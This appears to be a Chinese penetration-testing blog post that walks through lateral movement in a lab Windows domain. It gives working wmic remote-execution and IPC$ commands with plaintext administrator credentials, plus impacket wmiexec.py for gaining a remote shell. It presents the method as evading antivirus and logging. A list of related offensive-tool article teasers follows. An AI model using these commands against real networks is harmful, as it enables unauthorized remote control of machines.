windows监控txt写入_WMI(windows管理模块)横向渗透

最新推荐文章于 2024-08-07 23:17:11 发布
最新推荐文章于 2024-08-07 23:17:11 发布
阅读量218 收藏
点赞数
文章标签: windows监控txt写入

45f1fa8860e3e4de752011257299ead5.png

自从PsExec被杀毒软件监控之后,黑客们又开始转移到WMI上,通过渗透测试发现,使用wmiexec进行横向移动时,windows操作系统竟然无动于衷,没有做任何日志记录。于是,越来越多的APT高级持续性威胁,开始了对WMI进行攻击研究~

1、使用WMI远程命令执行

  • win7域用户--> windows server 2012域用户(成功)
wmic /node:192.168.160.143 /user:HACKBIJIAdministrator /password:W2ngluoanquan process call create "cmd.exe /c ipconfig >c:ip.txt"

4b5194e153614808c3be2c7b1132f1be.png
  • 去windows server 2012域用户的C盘下,可以发现生成的 ip.txt 文件

07fd1925a3d28a69766678198ab05a58.png
  • 建立IPC$ (win7域用户--> windows server 2012域用户)
net use 192.168.160.143ipc$ "W2ngluoanquan" /user:HACKBIJIAdministrator

2c110822217ea0dd58f42fdd29c4ffb9.png
  • 获取ip.txt文件信息 (windows server 2012域用户)
type 192.168.160.143c$ip.txt

8bca94506083f6c264071b8a71609d2e.png

2、impacket工具包中的wmiexec

  • impacket的github官方地址
  • kali --> windows server 2012 (成功)
  • 获取远程windows系统的控制权
  • 不需要输入域信息
  • 进入impacket目录,先执行pip install . 安装依赖
  • 然后就可以轻松拿到远程windows server 2012系统的控制权了
python wmiexec.py Administrator:W2ngluoanquan@192.168.160.143

e6ed3b7b6129484e051253e620e1092b.png

本篇完~

weixin_39808953
关注
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1540
内网环境下的横向移动总结
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 527
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
内网安全学习(三)---横向渗透
qi_SJQ_的博客
02-09 1103
横向 smb&wmi 明文或 hash 传递 1.前置知识: 知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码。 Windows2012以下版本安装KB2871997补丁,也会导致无法获取明文密码。 针对以上情况,我们提供了4种方式解决此类问题: 1.利用哈希hash传递(pth,ptk等)进行移动。 2.利用其他服务协议(SMB,WMI等)进行哈希移动。 3.利用注册表操作开启Wdigest Auth值进行获取。 4.利用工具或第三方平台(
渗透测试笔记】之【内网渗透——横向移动:WMI的使用】
AA8j的博客
11-18 4527
文章目录1. 自带WMIC2. Invoke-WmiCommand.ps13. Invoke-WMIMethod.ps14. wmiexec.vbs5. wmiexec.py 1. 自带WMIC 特点: 不会产生日志记录 没有回显,若要查看命令结果需要配合IPC$与type命令 wmic /node:10.1.1.2 /user:administrator /password:1234567.com process call create "cmd.exe /c ipconfig >c:\ip.t
Windows 内网渗透横向渗透
qq_53742230的博客
07-31 3507
内网渗透横向渗透
内网渗透横向移动wmi&smb&密码喷射CrackMapExec
m0_62207170的博客
04-22 2155
内网渗透横向移动wmi&smb&密码喷射CrackMapExec
Windows11渗透工具包分享
MachineGunJoe666
04-27 3152
启动命令:python3 test.py* 已集成本镜像所有python3工具的依赖库* 使用pip3命令调用python3 pip* 启动命令:python test.py* 已集成本镜像所有python2工具的依赖库* 使用pip命令调用python2 pip* 已配置环境变量- Perl v5.36.0 (WIndows下使用频率不高,perl脚本用WSL运行)- Gcc v12.2.0 (由WSL安装内置)* Nginx v1.18.0 默认启动* PHP v7.4。
红蓝视角之横向移动_蓝队视角1
08-03
横向移动】在网络安全领域,是指攻击者在成功渗透到目标网络系统后,为了扩大控制范围,通过内部网络的其他设备进行进一步的攻击活动。这种行为通常发生在红队(攻击方)与蓝队(防御方)的对抗中。本文将从蓝队的...
内网环境下的横向移动总结
hongduilanjun的博客
07-21 2738
前言在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5703
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
windows渗透测试工具包
03-30
x-can,流光,pstools,smbcrack2 解压后test文件就是,聪明的你不懂看readme
局域网渗透的一些小工具(支持win7)
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
Windows渗透工具-evil-winrm
勤能补拙、勤能补拙
01-13 1466
用于渗透测试的终极Windows远程管理shell 此程序可以在启用了此功能的任何Microsoft Windows Server上使用(通常在端口5985上),当然只有在您具有使用它的凭据和权限的情况下。
内网渗透横向移动&Wmi横移&Smb横移&CME&ProxyChains
最新发布
2301_76227305的博客
08-07 1070
以上便是本次横移的知识了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
windows监控txt写入_【内网渗透Windows下的内网传输技术
weixin_39611037的博客
12-11 173
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴大家好~掐指一算,好像已经一个月没更新过了...趁着现在不忙(才不是偷懒)赶紧更新一波~今天给大家分享的内容是Windows内网传输技术:有时候我们拿到一个不能上传shell,但可以命令执行的windows服务器时,可以通过多种方法进行文件上传和下载。一起来看看吧!Part.1FTPFTP环境部署 首先,ftp支持ASCII码传输、也...
细说内网横向工具WMIHACK
Lsec的博客
07-11 2047
1.前言 此工具为香山大佬开源的一款内网横向渗透工具,阅读源码后被大佬的思路及所使用的技术细节所震撼,并始终认为对于wmi没有一定了解是无法写出如此精妙的代码,获益良多。本文不对工具的使用做太多讲解,关于使用网上的文章已经太多了,只探讨背后的技术细节。 项目地址:https://github.com/360-Linton-Lab/WMIHACKER 1 基础知识 2.1 WMI简介 WMI 的全称是 Windows Management Instrumentation,即 Windows 管理
安装Windows渗透环境工具--PentestBox
weixin_30378623的博客
01-23 600
PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。 它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。 下载地址 https://pentestbox.org/zh/ 点击下载 选择安装有Metasploit的pentestbox。 下载完成是这样的安装包,双击...
java 监控txt_java监控文件运行状态
weixin_30234101的博客
02-13 120
package com.rmi.clent;import java.io.FileNotFoundException;import java.io.IOException;import java.io.RandomAccessFile;import java.nio.channels.FileChannel;import java.nio.channels.FileLock;import java...
Windows 免费渗透测试套件,包含140多款工具
Innocence_0的博客
02-03 190
Windows 免费渗透测试套件,包含140多款工具
WMI技术在Windows 7上的应用:远程管理与内存监控
WMI提供了对Windows系统以及其管理信息的统一访问机制,可以用于收集系统信息、控制系统设置和运行、监控系统性能等。WMI是基于Web-Based Enterprise Management(WBEM)和CIM(Common Information Model)标准开发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值